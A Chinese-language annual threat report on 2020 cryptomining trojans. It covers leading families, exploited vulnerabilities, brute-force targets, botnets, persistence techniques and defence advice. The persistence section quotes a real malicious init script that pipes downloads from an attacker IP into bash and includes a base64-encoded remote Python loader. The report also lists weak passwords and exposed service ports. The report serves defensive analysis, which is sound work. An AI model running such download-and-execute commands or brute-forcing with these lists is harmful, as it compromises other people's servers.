1、2020 挖礦木馬年度報告 一、摘要 2020 年各類數字加密貨幣價格迎來暴漲，比特幣價格一度超過 5 萬美元/BTC，市值達到 9200 億美元，是 2019 年底的 10 倍之多，達到了歷史最高點。同期挖礦木馬最偏好的門羅幣價格也同步增長 6 倍，這意味著黑客通過進行門羅幣挖礦，兌現后收益可達到以往收益的 6 倍。在如此大利益誘惑之下，黑產團伙已聞風而動，紛紛加入了對主機計算資源的爭奪。一個典型現象就是，有大量挖礦木馬在運行時，會嘗試清除競爭對手木馬。門羅幣價格曲線（數據來源：）根據騰訊安全威脅情報中心的檢測數據，2020 年挖礦木馬上升趨勢十分明顯。2020 年挖礦木馬增長趨勢 本報告以

2、騰訊安全產品獲取的安全事件告警工單數據為基礎，統計分析得出 2020年挖礦木馬的活躍家族 TOP 榜，從挖礦木馬主要入侵特點、漏洞利用偏好、持久化運行手段等方面展示其主要威脅，預測未來挖礦木馬攻擊可能呈現的新趨勢，給政企機構安全運維團隊提供常見挖礦木馬的防御清理建議。二、挖礦木馬風險 1.整體情況 1.1 挖礦家族 TOP 榜 2020 年度挖礦木馬家族排名前三的分別為 DTLMiner（永恒之藍下載器木馬）、H2Miner、GuardMiner，榜單中有通過永恒之藍漏洞傳播的為 DTLMiner、NSABuffMiner、NSAGluptebaMiner，有利用 Redis、Hadoop、W

3、eblogic、Drupal、thinkphp 等應用程序漏洞傳播的為 H2Miner、GuardMiner、z0Miner、8220Miner 等家族，以及主要通過弱口令爆破進行傳播的為 KoiMiner 家族。1.2 挖礦木馬的危害 挖礦木馬最容易被感知到的影響就是服務器性能會出現嚴重下降，從而影響服務器業務系統的正常運行，嚴重時可能出現業務系統中斷或系統崩潰。如下圖所示案例，H2Miner 挖礦木馬運行時占用了 98%的 CPU 資源，系統性能已嚴重受損。其次，挖礦木馬威脅事件往往伴隨著攻擊者組建僵尸網絡。感染挖礦木馬的同時，服務器已成為黑客控制的肉雞電腦，除了硬件資源被浪費，黑客還可能

4、利用失陷主機對其他目標進行攻擊，包括蠕蟲式的橫向攻擊擴散、對特定目標進行 DDoS攻擊、作為黑客下一步攻擊的跳板隱藏攻擊者線索或攻擊真實意圖、將失陷主機作為分發木馬的下載服務器或 C2 服務器等等。第三，失陷主機可能造成信息泄露。攻擊者入侵成功，很多情況下已獲得服務器的完全權限，只要攻擊者愿意，就可能盜取服務器數據，使受害企業面臨信息泄露風險，攻擊者也可能在服務器下載運行勒索病毒，隨時可能給企業造成更加嚴重的破壞。第四，攻擊者入侵安裝挖礦木馬的同時，還可能在服務器安裝后門、服務和計劃任務，實現對失陷主機的穩固長期控制。騰訊安全專家分析發現，較多挖礦木馬威脅事件發生后，攻擊者會添加管理員用戶、安

5、裝遠程控制軟件，以及為方便攻擊者下次連接開放特定的網絡端口。鑒于以上這些危害，我們建議政企機構安全運維人員高度警惕挖礦木馬感染事件，挖礦可能僅僅是攻擊者制造危害的第一步，極可能處于黑客入侵后危害最輕的階段。2.挖礦木馬入侵通道 2.1 利用漏洞攻擊 遠程代碼執行漏洞（RCE）可以讓遠程攻擊者直接向后臺服務器遠程注入操作系統命令或者惡意代碼，從而控制后臺系統，挖礦木馬攻擊時最常用的遠程代碼執行漏洞 TOP 統計如下：在 2020 年挖礦木馬最常利用的 RCE 漏洞排行榜里，WebLogic CVE-2019-2725高居榜首。此外，還有各種未授權訪問漏洞被攻擊者利用。即需要安全配置或權限認證的地

6、址、授權頁面存在缺陷導致攻擊者可以直接訪問，從而引發敏感信息泄露或惡意代碼執行。挖礦木馬攻擊時常用未授權訪問漏洞列表如下：未授權訪問應用類型 開放默認端口 Redis 6379 Hadoop Yarn RESET API 8088 Docker Remote API 2375 Kubernetes 10255/10250 Jenkins 8080 XXL-JOB 9999 寶塔面板 phpMyAdmin 888 Apache Flink Dashboard 8081 PostgreSQL 5342 典型案例 案例 1：Z0Miner 利用公開僅 15 天的高危漏洞攻擊挖礦 騰訊安全團隊于 20

7、20 年 11 月 2 日發現挖礦木馬團伙 z0Miner 利用 Weblogic未授權命令執行漏洞（CVE-2020-14882/14883）進行攻擊，本次攻擊距離Weblogic 官方發布安全公告（2020.10.21）之后僅僅 15 天。挖礦木馬團伙對于新漏洞武器的采用速度之快，由此可見一斑。這一案例促使安全研究人員需要更快速的響應高危安全漏洞，當面臨數量龐大的云主機高危漏洞需要修補時，對安全運維人員構成極大挑戰。案例 2：redis 服務器配置弱口令致 SuperManMiner 控制約萬臺主機挖礦 騰訊安全威脅情報中心檢測到利用 Redis 未授權訪問漏洞直接寫入計劃任務，下載用 g

8、olang 語言編寫的挖礦木馬下載器 superman，根據挖礦算力推測該團伙已控制約 1 萬臺失陷系統進行門羅幣挖礦。在本例中，部分政企機構使用 Redis 時，由于沒有對 redis 進行良好的配置，如使用空口令或者弱口令等，導致攻擊者可以直接訪問 redis 服務器，并可以通過該問題直接寫入計劃任務甚至可以直接拿到服務器權限。案例 3：RunMiner 控制約 1.6 萬臺主機挖礦 騰訊主機安全（云鏡）捕獲 RunMiner 挖礦木馬利用 Apache Shiro 反序列化漏洞（CVE-2016-4437）攻擊云服務器。RunMiner 挖礦團伙入侵成功后會執行命令反彈 shell 連接

9、到 C2 服務器對肉雞系統進行遠程控制，然后繼續下載執行Run.sh，下載 XMRig 挖礦木馬 tcpp 進行門羅幣挖礦，病毒通過安裝定時任務進行持久化。根據 RunMiner 挖礦木馬使用的門羅幣錢包算力(約 268.6KH/s)推算，該挖礦團伙已控制約 16000 臺服務器執行挖礦任務。在黑客控制的服務器上還發現多個掃描探測、網絡入侵和遠程控制工具，該團伙顯然是專業黑灰產經營團伙之一。2.2 爆破攻擊 用戶在設置系統登陸密碼時，為了方便記憶往往采用默認的空口令或者非常簡單的密碼例如 admin、root、test、111111、123456 等，使用這些密碼導致黑客可以輕易猜解并登陸，從

10、而入侵系統，部分常見的弱密碼如下：admin admin12 admin888 admin8 admin123 sysadmin adminxxx adminx root roots test test1 test123 test2 password aaaAAA111 888888 88888888 000000 00000000 111111 11111111 aaaaaa aaaaaaaa 135246 135246789 123456 許多挖礦木馬在傳播時也會針對系統的弱密碼進行爆破攻擊，根據騰訊安全 2020年云上安全報告提供的數據，默認用戶名、端口名被爆破攻擊的次數達數十億次之多。

11、常被挖礦木馬爆破攻擊的服務類型包括 SSH、Mssql、Redis 等，各類型爆破攻擊對應的挖礦家族如下：MS SQL 永恒之藍下載器木馬、GuardMiner、MrbMiner、BasedMiner、貪吃蛇挖礦木馬、快 GO 曠工 SSH 爆破 永恒之藍下載器木馬、Ks3_Miner、LoggerMiner、8220Miner、DDG Redis 爆破 永恒之藍下載器木馬、H2Miner、GuardMiner、DDG Msql 爆破 Mykings 2.3 僵尸網絡渠道 利用僵尸網絡渠道分發成為挖礦木馬越來越偏好的傳播手段之一，挖礦木馬自身也在組建僵尸網絡。僵尸網絡在分發安裝挖礦木馬的同時，

12、還會下載持久化模塊、遠程控制模塊、攻擊傳播模塊、自動更新模塊等多種惡意組件，以達到對已感染機器進行長久利用和控制的目的，已失陷的肉雞系統又會成為新的攻擊源，如此不斷擴大僵尸網絡的規模。具有僵尸網絡特征的挖礦木馬 TOP 榜如下，其中前三位是 DTLMiner（永恒之藍下載器木馬）、H2Miner、GuardMiner 為老牌僵尸網絡，由于控制該僵尸網絡的幕后黑客團伙仍在不斷更新其攻擊方法，使其在出現后的數年里仍然保持很高的活躍度。在 2020 年新活躍的挖礦木馬家族以 Linux 服務器為攻擊對象的居多，例如通過SSH 弱口令攻擊的 Outlaw、Prometei，通過 Docker Remo

13、te API 漏洞入侵的TeamTNT，以及通過 Nexus Repository Manager 3 弱密碼入侵，利用 Mysql、Tomcat 弱口令爆破，Weblogic 遠程代碼執行漏洞進行橫向擴散的 Sysrv-hello家族等等。典型案例 案例 4：TeamTNT TeamTNT 挖礦團伙通過批量掃描公網上開放 2375 端口的云服務器，并嘗試利用Docker Remote API 未授權訪問漏洞對云服務器進行攻擊。TeamTNT 在成功入侵云服務器后，會隱藏進程，通過安裝定時任務持久化，并收集主機上的隱私數據（如主機用戶名和密碼、RSA 登錄憑證、AWS CLI 跨賬戶授權信息、

14、docker 配置信息）上傳到 C2 服務器。與此同時，為了控制更多肉雞系統，增加挖礦收益，TeamTNT 團伙還利用 SSH 復用連接進行橫向移動以感染更多服務器。案例 5：Sysrv-hello 騰訊安全威脅情報中心檢測到 Sysrv-hello 僵尸網絡對云上 Nexus Repository Manager 3 存在默認帳號密碼的服務器進行攻擊。得手后再下載門羅幣礦機程序挖礦，同時下載 mysql、Tomcat 弱口令爆破工具，Weblogic 遠程代碼執行漏洞（CVE-2020-14882）攻擊工具進行橫向擴散。其攻擊目標同時覆蓋 Linux 和Windows 操作系統。案例 6：O

15、utlaw 騰訊安全威脅情報中心檢測到國內大量企業遭遇亡命徒（Outlaw）僵尸網絡攻擊。亡命徒（Outlaw）僵尸網絡最早于 2018 年被發現，其主要特征為通過 SSH 爆破攻擊目標系統，同時傳播基于 Perl 的 Shellbot 和門羅幣挖礦木馬。騰訊安全威脅情報中心安全大數據顯示，亡命徒（Outlaw）僵尸網絡已造成國內約 2 萬臺Linux 服務器感染，影響上萬家企業。此次攻擊傳播的母體文件為 dota3.tar.gz，可能為亡命徒（Outlaw）僵尸網絡的第 3 個版本，母體文件釋放 shell 腳本啟動對應二進制程序，kswapd0 負責進行門羅幣挖礦，tsm32、tsm64

16、負責繼續 SSH 爆破攻擊傳播病毒。3.挖礦木馬持久化 入侵者攻擊得逞之后，會通過各種技術手段安裝后門、服務和定時任務，添加管理員帳戶、開放網絡端口，實現對失陷主機的持久控制。3.1 Linux 定時任務 WatchbogMiner 通過多種方式創建定時任務，在指定的時間執行惡意代碼：1）通過寫入文件創建 寫入文件如下：/etc/crontab/var/spool/cron/root/var/spool/cron/crontabs/root/etc/cron.d/system/etc/cron.d/apache/etc/cron.d/root/etc/cron.hourly/oanacroan

17、e/etc/cron.daily/oanacroane/etc/cron.monthly/oanacroane 2）通過 crontab 命令創建 3）通過 at 命令創建 4）通過修改環境變量/home/$me/.bashrc、/root/.bashrc創建 3.2 Linux 系統服務 1）WannaMine 將惡意代碼寫入啟動目錄/etc/rc.d/init.d 目錄下，隨系統啟動執行。2）8220Miner 通過寫入系統初始化腳本/etc/init.d/down，將惡意代碼添加到啟動項。echo-e#!/bin/bash#BEGIN INIT INFO#Provides:down#Re

18、quired-Start:#Required-Stop:#Default-Start:2 3 4 5#Default-Stop:#Short-Description:down(by pwned)#END INIT INFO(curl-fsSL hxxp:/5.196.247.12/xms|wget-q-O-hxxp:/5.196.247.12/xms)|bash-sh;echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn|

19、base64-d|bash-;lwp-download hxxp:/5.196.247.12/xms/tmp/xms;bash/tmp/xms /etc/init.d/down 3）Muhstik 僵尸網絡通過寫入/etc/inittab，添加惡意程序到系統啟動項。4）4SHMiner 通過安裝服務/etc/init.d/c3pool_miner 啟動挖礦腳本。5）4SHMiner4SHMiner通過安裝服務/etc/systemd/system/moneroocean_miner.service 啟動挖礦腳本。3.3 Windows WMI KingMiner 使用 WMI 創建名為 Win

20、dowsSystemUpdate_WMITimer 的計時器，并 將 事 件 消 費 者WindowsSystemUpdate_consumer通 過 事 件 過 濾 器WindowsSystemUpdate _filter 綁定到計時器，從而通過計時器每 15 分鐘執行一次惡意腳本代碼。三、未來趨勢 挖礦木馬針對云上攻擊增長較快，企業安全管理人員時刻面臨新的挑戰。黑灰產業對謀求非法利益的追求沒有止境。受利益趨勢，挖礦團伙對新漏洞武器的采用速度越來越快，這對防御方的安全響應能力提出了更高的要求。與此同時，眾多網絡組件的安全漏洞仍會源源不斷涌現。舊的挖礦僵尸網絡依然活躍，新僵尸網絡不斷出現，模塊

21、化的、持續擴張、挖礦團伙跟僵尸網絡相互勾結的情況日趨多見。這種復雜的安全態勢使得政企機構難以采用單一技術方案防御和清除威脅。四、安全建議 騰訊安全團隊在 20 多年的安全實踐中，逐步改進保護自身業務所采用的多層級安全解決方案，將安全威脅情報、主機云防火墻、云主機安全等一系列安全產品統一由安全運營中心（SOC）管控，構建多層次的縱深防御體系，全面阻斷挖礦木馬的攻擊威脅。騰訊安全全系列產品支持在挖礦木馬、僵尸網絡入侵攻擊的各個環節進行檢測、防御：4.1 防御建議 1）建議政企機構運維人員對 Linux 服務器的 SSH 服務、Windows SQL Server等常用主機訪問入口設置高強度的登錄密

22、碼，以對抗弱口令爆破攻擊。推薦政企機構在終端部署騰訊云主機安全（云鏡）產品，騰訊主機安全產品具有密碼爆破攔截、異地登錄提醒、木馬文件查殺、高危漏洞檢測等安全功能，可對云主機的 Linux 系統、Mysql、Tomcat 等賬號的弱口令進行檢測。2）對于 Redis、Hadoop Yarn、Docker、XXL-JOB、Postgres 等應用增加授權驗證，對訪問對象進行控制。3）如果服務器部署了 Weblogic、Apache Struts、Apache Flink、ThinkPHP 等經常曝出高危漏洞的服務器組件，應及時將其更新到最新版本，并且實時關注組件官方網站和各大安全廠商發出的安全公告

23、，根據提示修復相關漏洞。推薦政企機構在網絡邊界部署騰訊云防火墻產品，騰訊云防火墻基于網絡流量進行威脅檢測與主動攔截，騰訊安全團隊會及時響應最流行的高危漏洞利用，快速發布檢測規則，使用虛擬補丁技術有效阻斷挖礦木馬入侵時利用的各類高危漏洞。4.2 清理建議 政企機構運維人員可以使用騰訊主機安全產品檢測清除入侵服務器的各種木馬，根據主機安全木馬查殺告警信息的指引徹底清除病毒木馬。在日常運維中，系統管理員可注意以下內容：1）檢查有無占用 CPU 資源接近甚至超過 100%的進程，如有找到進程對應文件，確認是否屬于挖礦木馬，Kill 挖礦木馬進程并刪除文件；kill 掉包含下載惡意 shell腳本代碼執行的進程；2）檢查/var/spool/cron/root、/var/spool/cron/crontabs/root 等文件中有無惡意腳本下載命令，有無挖礦木馬啟動命令，并將其刪除；3）如有發現挖礦相關進程、惡意程序，及時對服務器存在的系統漏洞、弱口令、Web 應用漏洞進行排查和修復。